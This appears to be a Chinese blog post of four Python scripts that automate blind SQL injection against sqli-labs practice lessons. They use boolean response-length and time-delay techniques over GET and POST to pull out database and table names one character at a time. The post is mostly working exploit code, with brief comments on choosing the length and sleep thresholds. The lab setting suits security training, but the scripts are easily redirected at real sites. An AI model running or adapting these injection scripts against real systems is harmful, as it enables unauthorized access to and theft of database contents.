BOOL型GET传参sql盲注
点击查看代码
import requests
chars =""
for i in range(32,127):
chars += chr(i)
result = ""
url_template = "http://yourip/sqllabs/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"
url_length = "http://yourip/sqllabs/Less-8/?id=2' and length(({0})) >{1} %23"
def get_result_length(payload,value):
for n in range(1,100):
url = url_length.format(payload,n)
response = requests.get(url)
length = len(response.text)
if length >value:
print("·······data length is :" + str(n))
return n
def get_db_name(data_length,payload,value):
for i in range(1,data_length):
for char in chars:
url = url_template.format(payload,i,ord(char))
response = requests.get(url)
length = len(response.text)
if length>value: #根据返回长度的不同来判断字符正确与否
global result
result += char
print("·······data is :"+ result)
break
#自定义 sql注入语句 payload 分割符 为0
payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "
# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值
value = 706
data_length = get_result_length(payload,value)+1
get_db_name(data_length,payload,value)
print(result)
点击查看代码
import requests
value =""
for i in range(32,127):
value += chr(i)
data=""
# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据
url = "http://yourip/sqllabs/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"
url_length="http://yourip/sqllabs/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"
def get_length(payload):
for n in range(1,100):
url= url_length.format(payload,n)
#print(url)
if(get_respone(url)):
print("[+] length is {0}".format(n))
return n
def get_data(payload,value,length):
for n in range(1,length):
for v in value :
url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码
#print(url_data)
if(get_respone(url_data)):
global data
data=data+v
print("[+] data is {0}".format(data))
break
def get_respone(url):
try:
html = requests.get(url,timeout=2)
return False
except Exception as e:
print("......")
return True
#可以更改payload 来获取需要的数据
databse_payload ="select database()"
get_data(databse_payload,value,get_length(databse_payload)+1)
点击查看代码
import requests
chars =""
for i in range(32,127):
chars += chr(i)
result = ""
def get_length(value): #获取要查询的数据的长度
for n in range(1,100):
payload = "admin' and length(({0})) ={1} #".format(data_payload,n)
data = {"uname":payload,"passwd":"admin"}
html = requests.post(url,data=data)
length = len(html.text)
if length >value:
print("……data length is :" + str(n))
return n
def get_data(data_length,value): #获取数据
global result
for i in range(1,data_length):
for char in chars:
payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))
data = {"uname":payload,"passwd":"admin"}
html = requests.post(url,data=data)
length = len(html.text)
if length>value: #根据返回长度的不同来判断字符正确与否
result += char
print("…… data is :"+ result)
break
url = "http://yourip/sqllabs/Less-15/"
data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"
value = 1460 # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看
length = get_length(value) +1
get_data(length,value)
print(result)
点击查看代码
import requests
import time
value =""
for i in range(32,127):
value += chr(i)
result=""
def get_length():#获取数据的长度
for n in range(1, 100):
payload = "admin' and if((length(({0} ))={1}),sleep(2),1) #".format(data_payload, n)
data = {"uname": payload, "passwd": "admin", "submit": "submit"}
start_time = time.time()
html = requests.post(url, data=data)
end_time = time.time()
use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了
if use_time > 2:
print("...... data's length is :"+ str(n))
return n
def get_data(length):#获取数据
global result
for n in range(1,length):
for v in value :
payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(2),1) #".format(data_payload,n,ord(v))
data = {"uname":payload,"passwd":"admin","submit":"submit"}
start_time = time.time()
requests.post(url,data=data)
end_time = time.time()
use_time = end_time - start_time
if use_time >2:
result += v
print("......"+result)
url = "http://yourip/sqllabs/Less-11/"
data_payload ="select database()"
length = get_length() + 1 #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10
get_data(length)
print(".....data is :"+ result)